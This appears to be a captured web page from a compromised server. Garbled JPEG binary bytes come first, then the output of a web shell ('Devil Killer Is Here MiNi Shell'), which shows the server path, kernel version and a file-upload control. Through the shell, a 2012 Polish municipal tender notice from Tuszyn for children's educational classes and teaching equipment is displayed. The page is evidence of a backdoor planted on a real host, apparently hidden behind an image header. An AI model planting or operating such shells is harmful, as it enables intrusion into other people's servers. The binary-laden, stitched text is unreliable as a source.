JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120316/82478-N-2012.html

<p class="kh_header"><b>Tuszyn: Świadczenie usługi edukacyjnej w projekcie o tytule ndywidualizacja nauczania uczniów klas I - III w gminie Tuszyn</b><br>
<b>Numer ogłoszenia: 82478 - 2012; data zamieszczenia: 16.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuszyn , ul. Piotrkowska 2/4, 95-080 Tuszyn, woj. łódzkie, tel. 042 6143325, faks 042 6143069.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tuszyn.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi edukacyjnej w projekcie o tytule ndywidualizacja nauczania uczniów klas I - III w gminie Tuszyn.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Realizacja zamówienia obejmuje świadczenie usług rozumianych jako przeprowadzanie specjalistycznych zajęć edukacyjnych wspierających indywidualizację procesu dydaktycznego, na poziomie właściwym dla nauczania w szkołach podstawowych w klasach I - III. Celem głównym usługi jest wyrównywanie szans edukacyjnych oraz rozwinięcie zainteresowań poprzez indywidualizację procesu kształcenia dzieci z klas I - III w 100%  szkół podstawowych funkcjonujących na terenie gminy Tuszyn, tj.: SP nr 1 w Tuszynie, SP nr 2 w Tuszynie, SP w Górkach Dużych, SP w Wodzinie Prywatnym.
Zakres, ilość i rodzaj zajęć w poszczególnych szkołach określają szczegółowe zadania stanowiące części zamówienia. Czas trwania jednej godziny zajęć przewiduje się jako 45 minut nieprzerwanej pracy.  Przedmiot zamówienia obejmuje następujące części:

Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu:
Ilość godzin - 540h łącznie dla wszystkich grup,
Ilość grup - 9
SP nr 1 w Tuszynie 3 gr. (7 i 6)-osobowe - 60 h,
SP nr 2 w Tuszynie 2 gr. 8-osobowe - 60 h,
SP w Górkach Dużych 2 gr. 8-osobowe - 60 h,
SP w Wodzinie Prywatnym 2 gr. 8-osobowe - 60 h,
Termin realizacji 
540h od dnia podpisania umowy do VI 2013 r.

Zajęcia dla dzieci ze specyficznymi trudnościami w matematyce:
Ilość godzin - 180h łącznie dla wszystkich grup,
Ilość grup - 3
SP nr 2 w Tuszynie 2 gr. 8-osobowe - 60 h,
SP w Górkach Dużych 1 gr. 8-osobowa - 60 h,
Termin realizacji 
180h od dnia podpisania umowy do VI 2013 r.

Zajęcia logopedyczne:
Ilość godzin - 1080h łącznie dla wszystkich grup,
Ilość grup - 18
SP nr 1 w Tuszynie 8 gr. (4 i 3)-osobowych - 60 h,
SP nr 2 w Tuszynie 4 gr. 4-osobowe - 60 h,
SP w Górkach Dużych 3 gr. 4-osobowe - 60 h,
SP w Wodzinie Prywatnym 3 gr. 4-osobowe - 60 h,
Termin realizacji 
1080h od dnia podpisania umowy do VI 2013 r.

Zajęcia gimnastyki korekcyjnej :
Ilość godzin - 420h łącznie dla wszystkich grup,
Ilość grup - 7
SP nr 1 w Tuszynie 2 gr. 10-osobowe - 60 h,
SP nr 2 w Tuszynie 2 gr. (10 i 9)-osobowe - 60 h,
SP w Górkach Dużych 1 gr. 10-osobowa - 60 h,
SP w Wodzinie Prywatnym 2 gr. 9-osobowe - 60 h,
Termin realizacji 
420h od dnia podpisania umowy do VI 2013 r.

Zajęcia rozwijające zainteresowania w zakresie nauk matematyczno-przyrodniczych:
Ilość godzin - 240h łącznie dla wszystkich grup,
Ilość grup - 4
SP nr 1 w Tuszynie 4 gr. 8-osobowe - 60 h,
Termin realizacji 
240h od dnia podpisania umowy do VI 2013 r.

Wykonawca dostarczy następujące pomoce dydaktyczne przewidziane do zakupu w budżecie projektu, na rzecz prawidłowej realizacji przedmiotu zamówienia:

Doposażenie bazy dydaktycznej SP nr 1 w Tuszynie:  dostawa pomocy dydaktycznych:
Dostawa laptopa (waga do 3 kg, przekątna ekranu min. 15.6, rozdzielczość ekranu min. 1366 x 768, procesor o właściwościach jak Intel Celeron 220 lub równoważny, pamięć RAM min. 2 GB, dysk twardy 250 GB, nagrywarka DVD, złącza USB i AV, system operacyjny Windows 7) - 1 sztuka.

Doposażenie bazy dydaktycznej SP nr 2 w Tuszynie: dostawa pomocy dydaktycznych:
Dostawa laptopa (waga do 3 kg, przekątna ekranu min. 15.6, rozdzielczość ekranu min. 1366 x 768, procesor o właściwościach jak Intel Celeron 220 lub równoważny, pamięć RAM min. 2 GB, dysk twardy 250 GB, nagrywarka DVD, złącza USB i AV, system operacyjny Windows 7) - 1 sztuka.

Doposażenie bazy dydaktycznej SP w Górkach Dużych: dostawa pomocy dydaktycznych:
Dostawa laptopa (waga do 3 kg, przekątna ekranu min. 15.6, rozdzielczość ekranu min. 1366 x 768, procesor o właściwościach jak Intel Celeron 220 lub równoważny, pamięć RAM min. 2 GB, dysk twardy 250 GB, nagrywarka DVD, złącza USB i AV, system operacyjny Windows 7) - 1 sztuka,
Pomoc dydaktyczna Kropki matematyczne gra ruchowa, zawartość:
mata z wytrzymałego winylu o wymiarze 122 x 152 cm, 2 duże kostki sześcienne z nadrukowanymi liczbami od 1 do 6, 1 duża kostka sześcienna z nadrukowanymi znakami + i -, kostki mają bok długości 12,7 cm i wykonane są z estetycznej pianki, 28 kartonowych żetonów, całość umieszczona w trwałym kartonowym pudełku - 1 sztuka,
Pomoc dydaktyczna Domino na mnożenie zawartość: 4 komplety domina, każdy komplet zawiera 24 kostki domina (8 x 4 cm), wykonane z grubego tworzywa (0,3 cm), umieszczone w pudełkach - 2 sztuki,
Pomoc dydaktyczna Waga metalowa z płaskimi szalkami do ważenia różnych przedmiotów, wym.: 14 x 17 x 40 cm - 1 sztuka,
Pomoc dydaktyczna Odważniki żeliwne i mosiężne zawartość: całkowity ciężar 5 kg - odważniki żeliwne: 1x 2000g, 2x 1000g, 1x 500g, 1x 200g, 2x 100g - odważniki mosiężne: 1x 50g, 1x 20g, 2x 10g, 1 x 5g, 2 x 2g, 1x 1g - odważniki dostarczane w podstawie z solidnego drewna - 1 zestaw,
Pomoc dydaktyczna Zestaw 6 pojemników do badania objętości komplet 6 zbiorniczów o wysokości ok.11 cm. i  pojemności od 0,25 litra do 1,0 litra: sześcian o pojemności 1,0 litra, sześcian o pojemności 0,5 litra, walec o pojemności 1,0 litra, walec o pojemności 0,5 litra, graniastosłup o podstawie trójkąta o pojemności 0,5 litra, graniastosłup o podstawie trójkąta o pojemności 0,25 litra, na wszystkich pojemnikach zamieszczono czytelną podziałkę - 1 zestaw,
Pomoc dydaktyczna Suwaki sylabowe - windy w zestawie: 16 kolorowych kart (24 windy-24 paski z sylabami), zeszyt A5 (32 str.), teczka - 2 sztuki,
Pomoc dydaktyczna Suwaki sylabowe - tarcze w zestawie: 16 kolorowych kart (30 tarcz), zeszyt A5 (40 stron), teczka - 2 sztuki,
Pomoc dydaktyczna Suwaki sylabowe - pociągi w zestawie: 17 kolorowych kart (24 pociągi, 24 paski z sylabami), zeszyt A5 (32 str.), teczka - 2 sztuki,
Pomoc dydaktyczna Suwaki terapeutyczne - gąsiennice w zestawie: 40 suwaków z powtarzającą się sylabą początkową (nagłosową) oraz 40 z powtarzającą się sylabą końcową (wygłosową), format: A4, 20 kolorowych kart, 28 str. (zeszyt), teczka - 1 sztuka, 
Pomoc dydaktyczna Suwaki terapeutyczne - windy w zestawie: 24 windy: 16 dwusylabowych (z ruchomą sylabą nagłosową lub wygłosową) oraz 8 trzysylabowych (z ruchomą sylabą śródgłosową), format: A4, teczka: 16 kolorowych kart, 32 str. (zeszyt) - 1 sztuka,
Pomoc dydaktyczna Suwaki terapeutyczne - tarcze w zestawie: 30 tarcz oraz pomoce ułatwiające łączenie odpowiednich sylab w wyrazy: strzała oraz tarcza z okienkiem, format: A4, teczka: 16 kolorowych kart, 40 str. (zeszyt) - 1 sztuka,
Pomoc dydaktyczna Suwaki terapeutyczne - pociągi w zestawie: 24 pociągi, format: A4, teczka: 17 kolorowych kart, 32 str. (zeszyt) - 1 sztuka.

Doposażenie bazy dydaktycznej SP w Wodzinie Prywatnym:
Dostawa laptopa (waga do 3 kg, przekątna ekranu min. 15.6, rozdzielczość ekranu min. 1366 x 768, procesor o właściwościach jak Intel Celeron 220 lub równoważny, pamięć RAM min. 2 GB, dysk twardy 250 GB, nagrywarka DVD, złącza USB i AV, system operacyjny Windows 7) - 1 sztuka,
Pomoc dydaktyczna Kropki matematyczne gra ruchowa, zawartość:
mata z wytrzymałego winylu o wymiarze 122 x 152 cm, 2 duże kostki sześcienne z nadrukowanymi liczbami od 1 do 6, 1 duża kostka sześcienna z nadrukowanymi znakami + i -, kostki mają bok długości 12,7 cm i wykonane są z estetycznej pianki, 28 kartonowych żetonów, całość umieszczona w trwałym kartonowym pudełku - 1 sztuka,
Pomoc dydaktyczna Domino na mnożenie zawartość: 4 komplety domina, każdy komplet zawiera 24 kostki domina (8 x 4 cm), wykonane z grubego tworzywa (0,3 cm), umieszczone w pudełkach - 2 sztuki,
Pomoc dydaktyczna Waga metalowa z płaskimi szalkami do ważenia różnych przedmiotów, wym.: 14 x 17 x 40 cm - 1 sztuka,
Pomoc dydaktyczna Odważniki żeliwne i mosiężne zawartość: całkowity ciężar 5 kg - odważniki żeliwne: 1x 2000g, 2x 1000g, 1x 500g, 1x 200g, 2x 100g - odważniki mosiężne: 1x 50g, 1x 20g, 2x 10g, 1 x 5g, 2 x 2g, 1x 1g - odważniki dostarczane w podstawie z solidnego drewna - 1 zestaw,
Pomoc dydaktyczna Zestaw 6 pojemników do badania objętości komplet 6 zbiorniczów o wysokości ok.11 cm. i  pojemności od 0,25 litra do 1,0 litra: sześcian o pojemności 1,0 litra, sześcian o pojemności 0,5 litra, walec o pojemności 1,0 litra, walec o pojemności 0,5 litra, graniastosłup o podstawie trójkąta o pojemności 0,5 litra, graniastosłup o podstawie trójkąta o pojemności 0,25 litra, na wszystkich pojemnikach zamieszczono czytelną podziałkę - 1 zestaw,
Pomoc dydaktyczna Suwaki sylabowe - windy w zestawie: 16 kolorowych kart (24 windy-24 paski z sylabami), zeszyt A5 (32 str.), teczka - 2 sztuki,
Pomoc dydaktyczna Suwaki sylabowe - tarcze w zestawie: 16 kolorowych kart (30 tarcz), zeszyt A5 (40 stron), teczka - 2 sztuki,
Pomoc dydaktyczna Suwaki sylabowe - pociągi w zestawie: 17 kolorowych kart (24 pociągi, 24 paski z sylabami), zeszyt A5 (32 str.), teczka - 2 sztuki,
Pomoc dydaktyczna Suwaki terapeutyczne - gąsiennice w zestawie: 40 suwaków z powtarzającą się sylabą początkową (nagłosową) oraz 40 z powtarzającą się sylabą końcową (wygłosową), format: A4, 20 kolorowych kart, 28 str. (zeszyt), teczka - 1 sztuka, 
Pomoc dydaktyczna Suwaki terapeutyczne - windy w zestawie: 24 windy: 16 dwusylabowych (z ruchomą sylabą nagłosową lub wygłosową) oraz 8 trzysylabowych (z ruchomą sylabą śródgłosową), format: A4, teczka: 16 kolorowych kart, 32 str. (zeszyt) - 1 sztuka,
Pomoc dydaktyczna Suwaki terapeutyczne - tarcze w zestawie: 30 tarcz oraz pomoce ułatwiające łączenie odpowiednich sylab w wyrazy: strzała oraz tarcza z okienkiem, format: A4, teczka: 16 kolorowych kart, 40 str. (zeszyt) - 1 sztuka,
Pomoc dydaktyczna Suwaki terapeutyczne - pociągi w zestawie: 24 pociągi, format: A4, teczka: 17 kolorowych kart, 32 str. (zeszyt) - 1 sztuka..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.31.00.00-0, 80.41.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta nie musi być zabezpieczona wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca skłąda oświadczenie, że spełnia warunki ubiegania się o udzielenie 	zamówienia z art. 22 ust. 1 oraz że nie podlega wykluczeniu z postępowania na 	podstawie art. 24 ust 1 i 2 Ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie, że brał czynny udział w realizacji lub współrealizacji projektów finansowanych lub współfinansowanych przez Unię Europejską w okresie poprzedzającym upływ terminu składania ofert, w których przedmiotem realizacji były usługi o charakterze podobnym rodzajowo do przedmiotu zamówienia, tj. podpadające pod kody CPV 80100000-5 - 80660000-8 - usługi edukacyjne lub szkoleniowe, a wartość jednego z tych projektów wynosiła co najmniej 100 tyś zł brutto. Kryterium oceny stanowi łączna ilość (liczba) projektów, która zostanie poddana ocenie* (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1b, wykonawca składa oświadczenie, że posiada doświadczenie w realizacji usług, gdzie przedmiotem wykonania były usługi o charakterze podobnym rodzajowo do przedmiotu zamówienia tj. świadczenie usługi edukacyjnej której odbiorcami były dzieci. Należy wykazać minimum jedną taką usługę na kwotę 100 tys. zł. (kwoty usług nie podlegają sumowaniu). Wartość poszczególnych usług nie stanowi kryterium oceny; oceniany jest łączny czas trwania tych usług* (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1b,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa wykaz osób niezbędnych do wykazania spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia, wraz ze stosownymi oświadczeniami woli nauczycieli przewidzianych do prowadzenia zajęć z ramienia Wykonawcy potwierdzające, że posiadają one wykształcenie kierunkowe właściwe dla świadczonej usługi* (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1c
 Wykonawca składa wykaz osób niezbędnych do wykazania spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia, wraz ze stosownymi oświadczenie woli nauczycieli przewidzianych do prowadzenia zajęć z ramienia Wykonawcy potwierdzające, że odbyli Oni przeszkolenie z zasad postępowania z dziećmi ze szkół podstawowych w zakresie prowadzenia zajęć edukacyjnych z zakresu przedmiotu zamówienia, uprawdopodobniające że Wykonawca daje rękojmię należytego wykonania zamówienia, (np. certyfikat, zaświadczenie od podmiotu przeprowadzającego przeszkolenie, szkolenie, kurs lub równoważne zajęcia w tym zakresie)* (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1c,
Wykonawca składa oświadczenia woli nauczycieli przewidzianych do prowadzenia zajęć z ramienia Wykonawcy - jeśli osoby te dysponują potwierdzeniem odbycia tego typu przeszkolenia, potwierdzające, że odbyli Oni przeszkolenie w zakresie równości szans - zasada równości szans kobiet i mężczyzn (np. certyfikat, zaświadczenie od podmiotu przeprowadzającego przeszkolenie, szkolenie, kurs lub równoważne zajęcia w tym zakresie)* (więcej w pkt. XIV SIWZ) - warunek z pkt. VIII. 1c.
*Przed (ewentualnym) podpisaniem umowy na żądanie Zamawiającego należy przedłożyć Zamawiającemu dokumenty potwierdzające oświadczony stan faktyczny ze stanem prawnym.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa aktualną informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, min. na 100 tys. zł, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - doświadczenie - 30</li>
<li>3 - kwalifikacje - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość przesunięcia terminu wykonania zamówienia w wypadku, gdyby nastąpiły opóźnienia związane z realizacją założeń projektowych, wynikające z przyczyn leżących po stronie Zamawiającego lub Instytucji Pośredniczącej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tuszyn.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.tuszyn.info.pl.</p>
